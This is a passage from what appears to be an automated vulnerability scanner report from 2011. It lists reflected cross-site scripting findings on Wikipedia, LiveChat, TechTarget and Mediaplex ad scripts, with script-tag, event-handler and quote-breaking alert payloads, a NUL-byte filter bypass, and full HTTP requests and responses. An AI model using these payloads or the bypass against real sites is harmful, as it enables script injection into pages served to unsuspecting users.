GET /wiki/%004394f<script>alert(1)</script>f633f3a958b/x26amp HTTP/1.1
Host: en.wikipedia.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Sun, 04 Sep 2011 14:01:37 GMT
Server: Apache
Cache-Control: private, s-maxage=0, max-age=0, must-revalidate
X-Wikimedia-Debug: prot=http:// serv=en.wikipedia.org loc=/wiki/%004394f<script>alert(1)</script>f633f3a958b/x26amp
Content-Length: 5410
Content-Type: text/html; charset=utf-8
X-Cache: MISS from sq61.wikimedia.org
X-Cache-Lookup: MISS from sq61.wikimedia.org:3128
X-Cache: MISS from sq38.wikimedia.org
X-Cache-Lookup: MISS from sq38.wikimedia.org:80
Connection: close

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Wikimedia page not found: http://en.wikipedia.org/wiki/%004394f<script&
...[SNIP]...
<p style="font-weight: bold;">To check for "%004394f<script>alert(1)</script>f633f3a958b/x26amp" on Wikipedia, see:
<a href="http://en.wikipedia.org/wiki/%004394f<script>
...[SNIP]...

1.25. http://en.wikipedia.org/wiki/Website#Product-_or_service-based_sites/x26amp [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://en.wikipedia.org
Path:	/wiki/Website#Product-_or_service-based_sites/x26amp

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00aa7a3"><script>alert(1)</script>8cfe4eae7a3 was submitted in the REST URL parameter 2. This input was echoed as aa7a3"><script>alert(1)</script>8cfe4eae7a3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Request

GET /wiki/%00aa7a3"><script>alert(1)</script>8cfe4eae7a3/x26amp HTTP/1.1
Host: en.wikipedia.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Sun, 04 Sep 2011 14:01:17 GMT
Server: Apache
Cache-Control: private, s-maxage=0, max-age=0, must-revalidate
X-Wikimedia-Debug: prot=http:// serv=en.wikipedia.org loc=/wiki/%00aa7a3"><script>alert(1)</script>8cfe4eae7a3/x26amp
Content-Length: 5438
Content-Type: text/html; charset=utf-8
X-Cache: MISS from sq61.wikimedia.org
X-Cache-Lookup: MISS from sq61.wikimedia.org:3128
X-Cache: MISS from sq71.wikimedia.org
X-Cache-Lookup: MISS from sq71.wikimedia.org:80
Connection: close

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Wikimedia page not found: http://en.wikipedia.org/wiki/%00aa7a3">&
...[SNIP]...
<a href="http://en.wikipedia.org/wiki/%00aa7a3"><script>alert(1)</script>8cfe4eae7a3/x26amp" title="Wikipedia:%00aa7a3">
...[SNIP]...

1.26. http://gis1.livechatinc.com/gis.cgi [jsonp parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://gis1.livechatinc.com
Path:	/gis.cgi

Issue detail

The value of the jsonp request parameter is copied into the HTML document as plain text between tags. The payload 4ba19<script>alert(1)</script>049c3a47bdf was submitted in the jsonp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /gis.cgi?serverType=control&licenseID=1019931&jsonp=__lc_load4ba19<script>alert(1)</script>049c3a47bdf HTTP/1.1
Host: gis1.livechatinc.com
Proxy-Connection: keep-alive
Referer: http://support.kasperskyamericas.com/corporate/anti-virus-6-r2-mp4-windows-workstations
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 85

__lc_load4ba19<script>alert(1)</script>049c3a47bdf({"server":"chat.livechatinc.net"})

1.27. http://gis2.livechatinc.com/gis.cgi [jsonp parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://gis2.livechatinc.com
Path:	/gis.cgi

Issue detail

The value of the jsonp request parameter is copied into the HTML document as plain text between tags. The payload 929e6<script>alert(1)</script>6e265ba17ce was submitted in the jsonp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /gis.cgi?serverType=control&licenseID=1019931&jsonp=__lc_load929e6<script>alert(1)</script>6e265ba17ce HTTP/1.1
Host: gis2.livechatinc.com
Proxy-Connection: keep-alive
Referer: http://support.kasperskyamericas.com/corporate/contact-information
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 85

__lc_load929e6<script>alert(1)</script>6e265ba17ce({"server":"chat.livechatinc.net"})

1.28. http://gis3.livechatinc.com/gis.cgi [jsonp parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://gis3.livechatinc.com
Path:	/gis.cgi

Issue detail

The value of the jsonp request parameter is copied into the HTML document as plain text between tags. The payload ea3d9<script>alert(1)</script>6b4f76bc96d was submitted in the jsonp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /gis.cgi?serverType=control&licenseID=1019931&jsonp=__lc_loadea3d9<script>alert(1)</script>6b4f76bc96d HTTP/1.1
Host: gis3.livechatinc.com
Proxy-Connection: keep-alive
Referer: http://support.kasperskyamericas.com/corporate/contact-information
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 85

__lc_loadea3d9<script>alert(1)</script>6b4f76bc96d({"server":"chat.livechatinc.net"})

1.29. http://gis4.livechatinc.com/gis.cgi [jsonp parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://gis4.livechatinc.com
Path:	/gis.cgi

Issue detail

The value of the jsonp request parameter is copied into the HTML document as plain text between tags. The payload d4bbe<script>alert(1)</script>ae16b26f03b was submitted in the jsonp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /gis.cgi?serverType=control&licenseID=1019931&jsonp=__lc_loadd4bbe<script>alert(1)</script>ae16b26f03b HTTP/1.1
Host: gis4.livechatinc.com
Proxy-Connection: keep-alive
Referer: http://support.kasperskyamericas.com/corporate/open-support-case
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 85

__lc_loadd4bbe<script>alert(1)</script>ae16b26f03b({"server":"chat.livechatinc.net"})

1.30. http://gis5.livechatinc.com/gis.cgi [jsonp parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://gis5.livechatinc.com
Path:	/gis.cgi

Issue detail

The value of the jsonp request parameter is copied into the HTML document as plain text between tags. The payload 6c10a<script>alert(1)</script>adbd0b08f57 was submitted in the jsonp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /gis.cgi?serverType=control&licenseID=1019931&jsonp=__lc_load6c10a<script>alert(1)</script>adbd0b08f57 HTTP/1.1
Host: gis5.livechatinc.com
Proxy-Connection: keep-alive
Referer: http://support.kasperskyamericas.com/corporate/live-chat
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 85

__lc_load6c10a<script>alert(1)</script>adbd0b08f57({"server":"chat.livechatinc.net"})

1.31. http://go.techtarget.com/clicktrack-r/activity/activity.gif [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://go.techtarget.com
Path:	/clicktrack-r/activity/activity.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload a6ee3<img%20src%3da%20onerror%3dalert(1)>42547d9da14 was submitted in the REST URL parameter 3. This input was echoed as a6ee3<img src=a onerror=alert(1)>42547d9da14 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /clicktrack-r/activity/activity.gifa6ee3<img%20src%3da%20onerror%3dalert(1)>42547d9da14?activityTypeId=16&t=299972&t2=301219&a=2011-09-04%2007:14:05&c=normal&r=340617&g=2240040538 HTTP/1.1
Host: go.techtarget.com
Proxy-Connection: keep-alive
Referer: http://searchsecurity.techtarget.com/tip/Addressing-the-dangers-of-JavaScript-in-the-enterprise
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: googFCF=a37ee93fdfdd1310VgnVCM1000000d01c80aRCRD; referrer=referrerhttp%3A%2F%2Fwww.google.com%2F%23sclient%3Dpsy%26hl%3Den%26tbm%3Dnws%26source%3Dhp%26q%3D%2522xss.cx%2522%26pbx%3D1%26oq%3D%2522xss.cx%2522%26aq%3Df%26aqi%3D%26aql%3D%26gs_sm%3De%26gs_upl%3D4842l5841l1l6289l8l7l0l0l0l0l221l967l2.3.2l7l0%26fp%3D1%26biw%3D1407%26bih%3D931%26bav%3Don.2%2Cor.r_gc.r_pw.%26cad%3Db%3Bkeyword%2522xss.cx%2522%3Basrc%3Beid%0A; tt_prereg=t1@299972%24t2@301219%24_2011-09-04%2007%3A14%3A05%26g%3D2240040538; __utma=1.1422293104.1315138449.1315138449.1315138449.2; __utmb=1.1.10.1315138449; __utmc=1; __utmz=1.1315138449.2.2.utmcsr=google.com|utmccn=(organic)|utmcmd=organic|utmctr=%22xss.cx%22; tt_ui=%7B%22textSize%22%3A0%7D; ugcCltHeight=

Response

HTTP/1.1 404 There is no Action mapped for namespace /activity and action name activity.gifa6ee3<img src=a onerror=alert(1)>42547d9da14.
Server: Resin/3.1.8
Content-Type: text/html; charset=utf-8
Date: Sun, 04 Sep 2011 12:17:38 GMT
Content-Length: 484

<html>
<head><title>404 There is no Action mapped for namespace /activity and action name activity.gifa6ee3<img src=a onerror=alert(1)>42547d9da14.</title></head>
<body>
<h1>404 There is no Action mapped for namespace /activity and action name activity.gifa6ee3<img src=a onerror=alert(1)>42547d9da14.</h1>
...[SNIP]...

1.32. http://hs.maas360.com/main-site-theme/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://hs.maas360.com
Path:	/main-site-theme/

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 59837--><a>584384740af was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /main-site-theme/?59837--><a>584384740af=1 HTTP/1.1
Host: hs.maas360.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 14:00:31 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 72315

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<a>584384740af=1"
[4]=>
...[SNIP]...

1.33. http://img.mediaplex.com/content/0/15949/135754/Capacity_Banner_3_640x480.js [mpck parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/15949/135754/Capacity_Banner_3_640x480.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7a0f4"-alert(1)-"e305e7e075d was submitted in the mpck parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /content/0/15949/135754/Capacity_Banner_3_640x480.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F15949-135754-6950-5%3Fmpt%3D0.77400058440205617a0f4"-alert(1)-"e305e7e075d&mpt=0.7740005844020561&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3b78/2/0/%2a/c%3B245674177%3B0-0%3B0%3B43070067%3B255-0/0%3B43820099/43837886/1%3B%3B%7Eaopt%3D2/0/25/0%3B%7Esscs%3D%3fhttp://tr.adinterax.com/re/computerworld%2CNWW_citrix_netscaler_f5_shadow_WelAd_090411_bonus%2CC%3DCitrix%2CP%3DNetworkWorld%2CA%3DCitrix%2CK%3D3059920/0.7740005844020561/0/tc%2cac%2cl2c%2cc:/ HTTP/1.1
Host: img.mediaplex.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkworld.com/?ba876%27-prompt(document.cookie)-%276d0de08921e=1
Cookie: svid=319726075672; mojo3=15949:6950/12896:18091/17550:16453/9609:2042

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 14:47:00 GMT
Server: Apache
Last-Modified: Wed, 31 Aug 2011 17:52:42 GMT
ETag: "8a79a7-f7f-4abd0cb778e80"
Accept-Ranges: bytes
Content-Length: 5563
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
<mpcke/>';
if (mpcke == 1) {
mpcclick = encodeURIComponent("altfarm.mediaplex.com%2Fad%2Fck%2F15949-135754-6950-5%3Fmpt%3D0.77400058440205617a0f4"-alert(1)-"e305e7e075d");
mpck = "http://" + mpcclick;
}
else if (mpcke == 2) {
mpcclick2 = encodeURIComponent("altfarm.mediaplex.com%2Fad%2Fck%2F15949-135754-6950-5%3Fmpt%3D0.77400058440205617a0f4"-alert(1)-"e305e7e075d");
...[SNIP]...

1.34. http://img.mediaplex.com/content/0/15949/135754/Capacity_Banner_3_640x480.js [mpck parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/15949/135754/Capacity_Banner_3_640x480.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c74b4'%3balert(1)//f093b248a6a was submitted in the mpck parameter. This input was echoed as c74b4';alert(1)//f093b248a6a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /content/0/15949/135754/Capacity_Banner_3_640x480.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F15949-135754-6950-5%3Fmpt%3D0.7740005844020561c74b4'%3balert(1)//f093b248a6a&mpt=0.7740005844020561&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3b78/2/0/%2a/c%3B245674177%3B0-0%3B0%3B43070067%3B255-0/0%3B43820099/43837886/1%3B%3B%7Eaopt%3D2/0/25/0%3B%7Esscs%3D%3fhttp://tr.adinterax.com/re/computerworld%2CNWW_citrix_netscaler_f5_shadow_WelAd_090411_bonus%2CC%3DCitrix%2CP%3DNetworkWorld%2CA%3DCitrix%2CK%3D3059920/0.7740005844020561/0/tc%2cac%2cl2c%2cc:/ HTTP/1.1
Host: img.mediaplex.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkworld.com/?ba876%27-prompt(document.cookie)-%276d0de08921e=1
Cookie: svid=319726075672; mojo3=15949:6950/12896:18091/17550:16453/9609:2042

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 14:47:03 GMT
Server: Apache
Last-Modified: Wed, 31 Aug 2011 17:52:42 GMT
ETag: "8a79a7-f7f-4abd0cb778e80"
Accept-Ranges: bytes
Content-Length: 5569
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
_citrix_netscaler_f5_shadow_WelAd_090411_bonus,C=Citrix,P=NetworkWorld,A=Citrix,K=3059920/0.7740005844020561/0/tc,ac,l2c,c:/http://altfarm.mediaplex.com/ad/ck/15949-135754-6950-5?mpt=0.7740005844020561c74b4';alert(1)//f093b248a6a" target="_blank">
...[SNIP]...

1.35. http://img.mediaplex.com/content/0/15949/135754/Capacity_Banner_3_640x480.js [mpvc parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/15949/135754/Capacity_Banner_3_640x480.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3905d"%3balert(1)//ecf698608ec was submitted in the mpvc parameter. This input was echoed as 3905d";alert(1)//ecf698608ec in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /content/0/15949/135754/Capacity_Banner_3_640x480.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F15949-135754-6950-5%3Fmpt%3D0.7740005844020561&mpt=0.7740005844020561&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3b78/2/0/%2a/c%3B245674177%3B0-0%3B0%3B43070067%3B255-0/0%3B43820099/43837886/1%3B%3B%7Eaopt%3D2/0/25/0%3B%7Esscs%3D%3fhttp://tr.adinterax.com/re/computerworld%2CNWW_citrix_netscaler_f5_shadow_WelAd_090411_bonus%2CC%3DCitrix%2CP%3DNetworkWorld%2CA%3DCitrix%2CK%3D3059920/0.7740005844020561/0/tc%2cac%2cl2c%2cc:/3905d"%3balert(1)//ecf698608ec HTTP/1.1
Host: img.mediaplex.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkworld.com/?ba876%27-prompt(document.cookie)-%276d0de08921e=1
Cookie: svid=319726075672; mojo3=15949:6950/12896:18091/17550:16453/9609:2042

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 14:47:05 GMT
Server: Apache
Last-Modified: Wed, 31 Aug 2011 17:52:42 GMT
ETag: "8a79a7-f7f-4abd0cb778e80"
Accept-Ranges: bytes
Content-Length: 5565
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
3837886/1;;~aopt=2/0/25/0;~sscs=?http://tr.adinterax.com/re/computerworld,NWW_citrix_netscaler_f5_shadow_WelAd_090411_bonus,C=Citrix,P=NetworkWorld,A=Citrix,K=3059920/0.7740005844020561/0/tc,ac,l2c,c:/3905d";alert(1)//ecf698608ec");
mpvc = mpvclick;
}
else if (mpvce == 2) {
mpvclick2 = encodeURIComponent("http://ad.doubleclick.net/click;h=v8/3b78/2/0/*/c;245674177;0-0;0;43070067;255-0/0;43820099/43837886/1;;~aopt=2/0/25/0;~ssc
...[SNIP]...

1.36. http://img.mediaplex.com/content/0/15949/135754/Capacity_Banner_3_640x480.js [mpvc parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/15949/135754/Capacity_Banner_3_640x480.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d58f0'%3balert(1)//57142596da5 was submitted in the mpvc parameter. This input was echoed as d58f0';alert(1)//57142596da5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /content/0/15949/135754/Capacity_Banner_3_640x480.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F15949-135754-6950-5%3Fmpt%3D0.7740005844020561&mpt=0.7740005844020561&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3b78/2/0/%2a/c%3B245674177%3B0-0%3B0%3B43070067%3B255-0/0%3B43820099/43837886/1%3B%3B%7Eaopt%3D2/0/25/0%3B%7Esscs%3D%3fhttp://tr.adinterax.com/re/computerworld%2CNWW_citrix_netscaler_f5_shadow_WelAd_090411_bonus%2CC%3DCitrix%2CP%3DNetworkWorld%2CA%3DCitrix%2CK%3D3059920/0.7740005844020561/0/tc%2cac%2cl2c%2cc:/d58f0'%3balert(1)//57142596da5 HTTP/1.1
Host: img.mediaplex.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkworld.com/?ba876%27-prompt(document.cookie)-%276d0de08921e=1
Cookie: svid=319726075672; mojo3=15949:6950/12896:18091/17550:16453/9609:2042

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 14:47:07 GMT
Server: Apache
Last-Modified: Wed, 31 Aug 2011 17:52:42 GMT
ETag: "8a79a7-f7f-4abd0cb778e80"
Accept-Ranges: bytes
Content-Length: 5565
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
3837886/1;;~aopt=2/0/25/0;~sscs=?http://tr.adinterax.com/re/computerworld,NWW_citrix_netscaler_f5_shadow_WelAd_090411_bonus,C=Citrix,P=NetworkWorld,A=Citrix,K=3059920/0.7740005844020561/0/tc,ac,l2c,c:/d58f0';alert(1)//57142596da5http://altfarm.mediaplex.com/ad/ck/15949-135754-6950-5?mpt=0.7740005844020561" target="_blank">
...[SNIP]...

1.37. http://img.mediaplex.com/content/0/17550/135052/CollabBreakaway_MM_Banner1_336x280.js [mpck parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/17550/135052/CollabBreakaway_MM_Banner1_336x280.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 51ff7'%3balert(1)//178d594bd57 was submitted in the mpck parameter. This input was echoed as 51ff7';alert(1)//178d594bd57 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /content/0/17550/135052/CollabBreakaway_MM_Banner1_336x280.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F17550-135052-6950-0%3Fmpt%3D825862051ff7'%3balert(1)//178d594bd57&mpt=8258620&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3b78/3/0/%2a/b%3B245464002%3B1-0%3B1%3B43070067%3B4252-336/280%3B43835960/43853747/1%3B%3B%7Eaopt%3D2/0/25/0%3B%7Esscs%3D%3f HTTP/1.1
Host: img.mediaplex.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkworld.com/?ba876%27-prompt(document.cookie)-%276d0de08921e=1
Cookie: svid=319726075672; mojo3=17550:6950/15949:6950/12896:18091/9609:2042

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 14:47:33 GMT
Server: Apache
Last-Modified: Wed, 31 Aug 2011 23:09:57 GMT
ETag: "803414-fc8-4abd53a0a9b40"
Accept-Ranges: bytes
Content-Length: 4922
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
ef="http://ad.doubleclick.net/click;h=v8/3b78/3/0/*/b;245464002;1-0;1;43070067;4252-336/280;43835960/43853747/1;;~aopt=2/0/25/0;~sscs=?http://altfarm.mediaplex.com/ad/ck/17550-135052-6950-0?mpt=825862051ff7';alert(1)//178d594bd57" target="_blank">
...[SNIP]...

1.38. http://img.mediaplex.com/content/0/17550/135052/CollabBreakaway_MM_Banner1_336x280.js [mpck parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/17550/135052/CollabBreakaway_MM_Banner1_336x280.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 656a0"-alert(1)-"a474aaf0673 was submitted in the mpck parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /content/0/17550/135052/CollabBreakaway_MM_Banner1_336x280.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F17550-135052-6950-0%3Fmpt%3D8258620656a0"-alert(1)-"a474aaf0673&mpt=8258620&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3b78/3/0/%2a/b%3B245464002%3B1-0%3B1%3B43070067%3B4252-336/280%3B43835960/43853747/1%3B%3B%7Eaopt%3D2/0/25/0%3B%7Esscs%3D%3f HTTP/1.1
Host: img.mediaplex.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkworld.com/?ba876%27-prompt(document.cookie)-%276d0de08921e=1
Cookie: svid=319726075672; mojo3=17550:6950/15949:6950/12896:18091/9609:2042

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 14:47:31 GMT
Server: Apache
Last-Modified: Wed, 31 Aug 2011 23:09:57 GMT
ETag: "803414-fc8-4abd53a0a9b40"
Accept-Ranges: bytes
Content-Length: 4916
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
<mpcke/>';
if (mpcke == 1) {
